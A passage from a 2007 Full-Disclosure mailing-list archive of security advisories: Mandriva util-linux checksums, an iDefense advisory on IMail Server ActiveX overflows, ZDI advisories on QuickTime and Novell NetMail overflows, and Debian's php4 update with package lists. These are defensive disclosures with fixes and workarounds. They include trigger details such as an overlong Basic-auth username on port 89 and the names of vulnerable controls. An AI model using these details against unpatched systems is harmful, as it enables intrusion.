ad2334ebeedebd8ac97a7f5dd9eb069c 2006.0/x86_64/util-linux-2.12q-7.1.20060mdk.x86_64.rpm 4181f6388cffa1f5d0c134a0e794ea71 2006.0/SRPMS/util-linux-2.12q-7.1.20060mdk.src.rpm Mandriva Linux 2007.0: be8d93e00b9409cd85cb861968b686f4 2007.0/i586/losetup-2.12r-8.1mdv2007.0.i586.rpm 597f4b9617ae60582bd32e0e63f4fbd3 2007.0/i586/mount-2.12r-8.1mdv2007.0.i586.rpm cb2af6b6338503687b2d9bf981ec6eae 2007.0/i586/util-linux-2.12r-8.1mdv2007.0.i586.rpm 84c9f8434a019c30f48b43918be5f9b0 2007.0/SRPMS/util-linux-2.12r-8.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: e98587221d25c0ac85e2940d86804dc8 2007.0/x86_64/losetup-2.12r-8.1mdv2007.0.x86_64.rpm 2aea6f88545e4cf9044fa881dc2a65c0 2007.0/x86_64/mount-2.12r-8.1mdv2007.0.x86_64.rpm 935566fa98f9a67e1bf35ef87b1d1246 2007.0/x86_64/util-linux-2.12r-8.1mdv2007.0.x86_64.rpm 84c9f8434a019c30f48b43918be5f9b0 2007.0/SRPMS/util-linux-2.12r-8.1mdv2007.0.src.rpm Corporate 4.0: dbbd5f67e178668cad4e5b7ef6e2262d corporate/4.0/i586/losetup-2.12q-7.1.20060mlcs4.i586.rpm ae2f4f127dffbe561e9c5e7317c06e91 corporate/4.0/i586/mount-2.12q-7.1.20060mlcs4.i586.rpm a8307c070f29680d1738c9b7f09490bc corporate/4.0/i586/util-linux-2.12q-7.1.20060mlcs4.i586.rpm feb291bbb8a7f6077d07243877820737 corporate/4.0/SRPMS/util-linux-2.12q-7.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: aa38dd206ed22d1bf34754eeffe453a9 corporate/4.0/x86_64/losetup-2.12q-7.1.20060mlcs4.x86_64.rpm 2ebe6970426e9d05ccf1210c9191022d corporate/4.0/x86_64/mount-2.12q-7.1.20060mlcs4.x86_64.rpm 1606664f39063aae9e8c7afa1494ec22 corporate/4.0/x86_64/util-linux-2.12q-7.1.20060mlcs4.x86_64.rpm feb291bbb8a7f6077d07243877820737 corporate/4.0/SRPMS/util-linux-2.12q-7.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF7frTmqjQ0CJFipgRAoIeAJ95zZCDvtYN6gdnE46xMZ4GIk/DuACgyJvt Y3/T02qmxqESK0wffHeb+hA= =V7df -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Wed Mar 7 15:52:57 2007 From: labs-no-reply at idefense.com (iDefense Labs) Date: Wed, 07 Mar 2007 10:52:57 -0500 Subject: [Full-disclosure] iDefense Security Advisory 03.07.07: Ipswitch IMail Server 2006 Multiple ActiveX Control Buffer Overflow Vulnerabilities Message-ID: <45EEDFD9.4040409@idefense.com> Ipswitch IMail Server 2006 Multiple ActiveX Control Buffer Overflow Vulnerabilities iDefense Security Advisory 03.07.07 http://labs.idefense.com/intelligence/vulnerabilities/ Mar 07, 2007 I. BACKGROUND Ipswitch Inc.'s IMail Server is an email server aimed at providing easy to configure and maintain email services for for small organizations. More information can be found on the vendors site at the following URL. http://www.ipswitch.com/products/messaging.asp II. DESCRIPTION Remote exploitation of several ActiveX control buffer overflow vulnerabilities in Ipswitch Inc.'s IMail Server 2006 could allow attackers to execute arbitrary code with the credentials of the user visiting a malicious website. Multiple stack and heap based buffer overflows caused be unsafe strcpy and wsprintf calls could corrupt memory in a way that leads to code execution. Details for the vulnerable controls follow: ProgID: IMAILAPILib.IMailServer CLSID: 302397C2-8501-11D4-8D29-00010245C51E targetFile: C:\Program Files\Ipswitch\IMail\IMailAPI.dll memberName: WebConnect memberName: Connect ProgID: IMAILAPILib.IMailLDAPService CLSID: 889558D4-CE9A-4A1B-B88A-AF7774A80E25 targetFile: C:\Program Files\Ipswitch\IMail\IMailAPI.dll memberName: Sync3 memberName: Init3 ProgID: IMAILAPILib.IMailUserCollection CLSID: 302397D6-8501-11D4-8D29-00010245C51E targetFile: C:\Program Files\Ipswitch\IMail\IMailAPI.dll memberName: SetReplyTo III. ANALYSIS To exploit this issue, a user would have to visit a malicious website from a computer with IMail Server installed on it. The vulnerable component is also likely installed with any IPSwitch product that includes the IMail Server. This includes products such as its Collaboration Suite packages. IV. DETECTION iDefense has confirmed this vulnerability in IMail Server 2006. V. WORKAROUND Setting the the kill-bit for the following CLSIDs will prevent exploitation of these vulnerabilities within Internet Explorer. 302397C2-8501-11D4-8D29-00010245C51E 302397D6-8501-11D4-8D29-00010245C51E 889558D4-CE9A-4A1B-B88A-AF7774A80E25 VI. VENDOR RESPONSE Ipswitch has addressed the aforementioned vulnerabilities within version 2006.2 of IMail Server. More information can be found from their release notes at the following URL. http://support.ipswitch.com/kb/IM-20070305-JH01.htm VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 01/22/2007 Initial vendor notification 03/05/2007 Vendor publicly disclosed issues 03/07/2007 iDefense public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From zdi-disclosures at 3com.com Wed Mar 7 19:53:17 2007 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Wed, 7 Mar 2007 11:53:17 -0800 Subject: [Full-disclosure] ZDI-07-010: Apple Quicktime UDTA Parsing Heap Overflow Vulnerability Message-ID: ZDI-07-010: Apple Quicktime UDTA Parsing Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-010.html March 7, 2007 -- CVE ID: CVE-2007-0714 -- Affected Vendor: Apple -- Affected Products: Quicktime Player 7.1 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since May 23, 2006 by the pre-existing Digital Vaccine protection filter ID 4411. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of forged size fields in user-defined data atoms (UDTA). By setting this field to an overly large value, an integer overflow occurs resulting in an exploitable heap overflow. Successful exploitation results in code execution under the context of the running user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://docs.info.apple.com/article.html?artnum=61798 -- Disclosure Timeline: 2006.05.23 - Pre-existing Digital Vaccine released to TippingPoint customers 2006.08.14 - Vulnerability reported to vendor 2007.03.07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From zdi-disclosures at 3com.com Wed Mar 7 19:53:03 2007 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Wed, 7 Mar 2007 11:53:03 -0800 Subject: [Full-disclosure] ZDI-07-009: Novell Netmail WebAdmin Buffer Overflow Vulnerability Message-ID: ZDI-07-009: Novell Netmail WebAdmin Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-009.html March 7, 2007 -- CVE ID: CVE-2007-1350 -- Affected Vendor: Novell -- Affected Products: Novell NetMail 3.5.2 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since December 14, 2006 by Digital Vaccine protection filter ID 4927. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell NetMail. Authentication is not required to exploit this vulnerability. The specific flaw exists in the webadmin.exe process bound by default on TCP port 89. During HTTP Basic authentication, a long username of at least 213 bytes will trigger a stack based buffer overflow due to a vulnerable sprintf() call. Exploitation of this issue can result in arbitrary code execution. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://download.novell.com/Download?buildid=sMYRODW09pw -- Disclosure Timeline: 2006.12.12 - Vulnerability reported to vendor 2006.12.14 - Digital Vaccine released to TippingPoint customers 2007.03.07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by an anonymous researcher. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. From jmm at debian.org Wed Mar 7 22:04:16 2007 From: jmm at debian.org (Moritz Muehlenhoff) Date: Wed, 7 Mar 2007 23:04:16 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1264-1] New php4 packages fix several vulnerabilities Message-ID: <20070307220416.GA3371@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1264-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff March 7th, 2007 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : php4 Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-0906 CVE-2007-0907 CVE-2006-0908 CVE-2007-0909 CVE-2007-0910 CVE-2007-0988 Several remote vulnerabilities have been discovered in PHP, a server-side, HTML-embedded scripting language, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-0906 It was discovered that an integer overflow in the str_replace() function could lead to the execution of arbitrary code. CVE-2007-0907 It was discovered that a buffer underflow in the sapi_header_op() function could crash the PHP interpreter. CVE-2007-0908 Stefan Esser discovered that a programming error in the wddx extension allows information disclosure. CVE-2007-0909 It was discovered that a format string vulnerability in the odbc_result_all() functions allows the execution of arbitrary code. CVE-2007-0910 It was discovered that super-global variables could be overwritten with session data. CVE-2007-0988 Stefan Esser discovered that the zend_hash_init() function could be tricked into an endless loop, allowing denial of service through resource consumption until a timeout is triggered. For the stable distribution (sarge) these problems have been fixed in version 4:4.3.10-19. For the unstable distribution (sid) these problems have been fixed in version 6:4.4.4-9 of php4 and version 5.2.0-9 of php5. We recommend that you upgrade your php4 packages. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19.dsc Size/MD5 checksum: 1686 65acb80d308f7625e8ec91bb6e29eb29 http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19.diff.gz Size/MD5 checksum: 283658 c7c1e0ce432510ed48cd9e135a21a59e http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz Size/MD5 checksum: 4892209 73f5d1f42e34efa534a09c6091b5a21e Architecture independent components: http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-19_all.deb Size/MD5 checksum: 250024 8005785eca558044984ca6a66019c02f http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19_all.deb Size/MD5 checksum: 1142 bd2113b4fc760a9e2d81f67ccf24fcac Alpha architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_alpha.deb Size/MD5 checksum: 1701456 14d35e1ca06e0a4339b1b8c885a6bd8f http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_alpha.deb Size/MD5 checksum: 1699180 4e630e589b36cf5143c772802ef4bafc http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_alpha.deb Size/MD5 checksum: 3466040 56e187c9cabb148b5681074f2ebcf6d2 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_alpha.deb Size/MD5 checksum: 1743378 4251694e892c47e59dad839e9ab7a2bc http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_alpha.deb Size/MD5 checksum: 168220 6595a46953cfa5156cc9dfbebfb57238 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_alpha.deb Size/MD5 checksum: 18148 9944bd006a811a68280d58707dba0fca http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_alpha.deb Size/MD5 checksum: 325162 3bf569109326bf57a6db0908864d7d4f http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_alpha.deb Size/MD5 checksum: 39036 0c174134c0af3da2a44471e0b6a0c0d9 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_alpha.deb Size/MD5 checksum: 34546 12b9ead7e3d2bc3d586db7c639b25a71 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_alpha.deb Size/MD5 checksum: 38140 f600d5a57454eac81a59614e396d0a7e http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_alpha.deb Size/MD5 checksum: 21370 4bc085128a86ebe0b5aff3f33c6b85a5 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_alpha.deb Size/MD5 checksum: 18206 00041519f22ba5528a61384a1cd8ff25 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_alpha.deb Size/MD5 checksum: 8340 5faa2f4f4dcc1e6d691fb4e514be1206 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_alpha.deb Size/MD5 checksum: 22454 8b815228a909700fecf5bc08301605b6 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_alpha.deb Size/MD5 checksum: 28368 230200935d5b2fe06fc6d01abcf36dc6 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_alpha.deb Size/MD5 checksum: 7964 a6b4bbd2b60752668b3556cdcbafbf78 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_alpha.deb Size/MD5 checksum: 13770 76441138f5d1bed6c02f43c5a2c55f0c http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_alpha.deb Size/MD5 checksum: 23304 d7802126ab8dde4842a72fca318e0424 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_alpha.deb Size/MD5 checksum: 17886 f341be585bc1342cc87cf814283dc826 AMD64 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_amd64.deb Size/MD5 checksum: 1660864 6e8eea11106fd4b06d5d52ab41671003 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_amd64.deb Size/MD5 checksum: 1658212 e874bb3b60124b4e32732e9b3988c47a http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_amd64.deb Size/MD5 checksum: 3278508 aac0f56842fe12b91dc7acab71f1be03 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_amd64.deb Size/MD5 checksum: 1648682 51d7e77dba0ed241fa4bd60f110bcc69 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_amd64.deb Size/MD5 checksum: 168202 11bf04caba233142536151ff0decf329 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_amd64.deb Size/MD5 checksum: 17830 6079814a18fab1b42068de9fd1d35a29 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_amd64.deb Size/MD5 checksum: 325184 9c48363c84aa56f9020d83cef98d8b75 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_amd64.deb Size/MD5 checksum: 40800 d7ac88bc6c813a747c8ae14681605b35 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_amd64.deb Size/MD5 checksum: 34280 3b1eb57caa289d1c776f66d6734dee39 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_amd64.deb Size/MD5 checksum: 37726 014109aa721508ef8b6825e5e9744fac http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_amd64.deb Size/MD5 checksum: 21416 6b2bf18f6d6db5ee5bf57199639e9870 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_amd64.deb Size/MD5 checksum: 18886 01b618565ddfce919b8fffba1b336fad http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_amd64.deb Size/MD5 checksum: 8248 8e56bda6cd19f62248eba36057f9c381 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_amd64.deb Size/MD5 checksum: 22892 6789a85586205f00dd35f396012d437f http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_amd64.deb Size/MD5 checksum: 28786 87c5652813f3fc2e636d0de7c6504585 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_amd64.deb Size/MD5 checksum: 7918 c672b5d5a0dcc8ec56ae29b866909ee7 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_amd64.deb Size/MD5 checksum: 13684 7996ac194aad7b71aca2ce125f3fe53a http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_amd64.deb Size/MD5 checksum: 22444 fba5d84d8727dc342a4613cb4f0e5fca http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_amd64.deb Size/MD5 checksum: 17576 182a9c583741056b4f903071066aa777 ARM architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_arm.deb Size/MD5 checksum: 1592392 e6c3e603f4b01b8b6472a01fa5c8b149 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_arm.deb Size/MD5 checksum: 1591960 42fc42a21fafe9980b1cbbd1450b6ebe http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_arm.deb Size/MD5 checksum: 3172326 44e7b476a2e1f1d6a8a3515aa407dddb http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_arm.deb Size/MD5 checksum: 1593200 0b02299dad2f9a76ee4e11f2d1aba8f1 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_arm.deb Size/MD5 checksum: 168244 f3c5d8aa86020ded4056f329cb005fe4 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_arm.deb Size/MD5 checksum: 17652 459d0f476feee2720542be633d56a92b http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_arm.deb Size/MD5 checksum: 325472 a741698e463184d3b278412189c9c1c2 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_arm.deb Size/MD5 checksum: 36114 5de247081d931105d8dfcad25dead156 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_arm.deb Size/MD5 checksum: 31782 8581635d5ffcb20066ad8a17742bf27e http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_arm.deb Size/MD5 checksum: 35462 da35a74bd0d0db3f7488860e19cfa79d http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_arm.deb Size/MD5 checksum: 19736 9be69fb529fcf733a91ac24b024a9958 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_arm.deb Size/MD5 checksum: 17086 5e372f2c55c6db64733458342fd27952 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_arm.deb Size/MD5 checksum: 7826 6b2e87408132edfc496475409128f949 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_arm.deb Size/MD5 checksum: 20600 cfad055dec9f682724478910247d974e http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_arm.deb Size/MD5 checksum: 27330 5c1904d04e7f81349b2d78e1cb7abe3b http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_arm.deb Size/MD5 checksum: 7644 d6ce09f4c247eb1a69965bc90836df81 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_arm.deb Size/MD5 checksum: 12790 31d406e601ca65bfc8a2779d0e7cebb4 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_arm.deb Size/MD5 checksum: 20892 822c073cb45186c6d872afdef513bc90 http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_arm.deb Size/MD5 checksum: 15792 169a0517a14c792e870fcf1b94192276 HP Precision architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_hppa.deb Size/MD5 checksum: 1759810 d97fae3b1a080a942653878c82cd3ffa http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_hppa.deb Size/MD5 checksum: 1757570 5c77a078ff8b20ea0402b4a904e0232b http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_hppa.deb Size/MD5 checksum: 3427812 03e08da005f5f97a6ecd7ab60b5ce68c http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_hppa.deb Size/MD5 checksum: 1719506 0d0b5c78f2493fa4911db750d517998a http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_hppa.deb Size/MD5 checksum: 168222 7370b1318dc8c75d7008c255b2002f6a http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_hppa.deb Size/MD5 checksum: 20028 45464c08d59854305c4a5c9f490d9a63 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_hppa.deb Size/MD5 checksum: 325312 ecccda98a727a5eaf06a0f0b17185cce http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_hppa.deb Size/MD5 checksum: 42104 40d2342dcc42b48485573952cffc03f7 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_hppa.deb Size/MD5 checksum: 37340 88ff9b02b36a7a1c9c2fce8056ef6f15 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_hppa.deb Size/MD5 checksum: 42648 8f1169758d56f94f0c92142be87d6be0 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_hppa.deb Size/MD5 checksum: 23000 12fa26227ed747fa3af3ad9efeb8d504 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_hppa.deb Size/MD5 checksum: 19908 560ad81c6f6db1820c6c572f67cd8152 http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_hppa.deb Size/MD5 checksum: 8698 0656ad921535945f456fb480cc80743f http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_hppa.deb Size/MD5 checksum: 23596 2fae2e9262934c47965416824c08943b http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_hppa.deb Size/MD5 checksum: 30172 d2aaabd18fe095a8e106e20505f03ef2 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_hppa.deb Size/MD5 checksum: 8340 5f2d0de885c904fec8a775afc40b6334 http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_hppa.deb Size/MD5 checksum: 14562 e5dd41449a0e1b35188c7b1946610862 http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_hppa.deb Size/MD5 checksum: 24124 786abb1633ebf48ab459f4e96656efba http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_hppa.deb Size/MD5 checksum: 18650 afab0398769e8c50b934ee221ea50a5a Intel IA-32 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_i386.deb Size/MD5 checksum: 1614182 612dd25787db4bba5c0b54006c02d50b http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_i386.deb Size/MD5 checksum: 1612058 9a67d7f1a9aade4bb3eed6b392077bf9 http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_i386.deb Size/MD5 checksum: 3209228 5ac98a8a5649ea2ae6588c4e460ec90c http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_i386.deb Size/MD5 checksum: 1609646 ec3d17f2b3024ef5ed6e8b21c4286b26 http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_i386.deb Size/MD5 checksum: 168222 9ab456c6fe0ed13f2e591f88a26f81d6 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_i386.deb Size/MD5 checksum: 17892 92d2e8793dfca9be7576624beb4b0005 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_i386.deb Size/MD5 checksum: 325192 1a382f30b8ece263b027cfcc35ecfe9c http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_i386.deb Size/MD5 checksum: 37228 317fd23c3687d861b8b4789c1ea381d1 http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_i386.deb Size/MD5 checksum: 32384 d0655edb839dae2fa8ce269c84e91500 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_i386.deb Size/MD5 checksum: 37402 95a94b237e75a4c1a64bcb592b351498 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_i386.deb Size/MD5 checksum: 19958 9cd9bd8707c8b781e9196311f031ec02 http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_i386.deb Size/MD5 checksum: 17672 4b6d7c1eca69b9b218617ac243fa08ad http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_i386.deb Size/MD5 checksum: 8036 d2efa8096dc22d3c83f8095bb1ab4041 http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_i386.deb Size/MD5 checksum: 21218 042bca1661b147c7be77a69936793904 http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_i386.deb Size/MD5 checksum: 27138 7bbf0a0bd2aee657573d7174f32f1ae7 http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_i386.deb Size/MD5 checksum: 7704 449baf33502b9f48c083dc4b338979dd http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_i386.deb Size/MD5 checksum: 13152 e1843d982173596abed784d8e7afcafa http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_i386.deb Size/MD5 checksum: 21382 629931e8d3024d1905071ec9dca9142b http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_i386.deb Size/MD5 checksum: 16400 d58ba81b22439e5285d448c4316bf5f0 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_ia64.deb Size/MD5 checksum: 1952256 b11fa1724bd55829b353525d564e47cc http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_ia64.deb Size/MD5 checksum: 1949710 aa0d4ee3995c997f265c272bc0445e1d http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_ia64.deb Size/MD5 checksum: 3895870 c29d60863e2331e919339626831fb5a4 http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_ia64.deb Size/MD5 checksum: 1950132 2a7611e476d2afd7f5564e7f4cafac3a http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_ia64.deb Size/MD5 checksum: 168224 f3c570f637fb69b0d55dbdaaaf882c53 http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_ia64.deb Size/MD5 checksum: 22028 f51f4140ef5d8de1db90bfe06d92d8b8 http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_ia64.deb Size/MD5 checksum: 325338 41a5b1ff824be8410e94d5d3f4eaab5c http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_ia64.deb Size/MD5 checksum: 50644 a1f0f2f91dfbf84d24446e455e4d0d7c http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_ia64.deb Size/MD5 checksum: 45256 45155a527b60ebcd117901fc86390d67 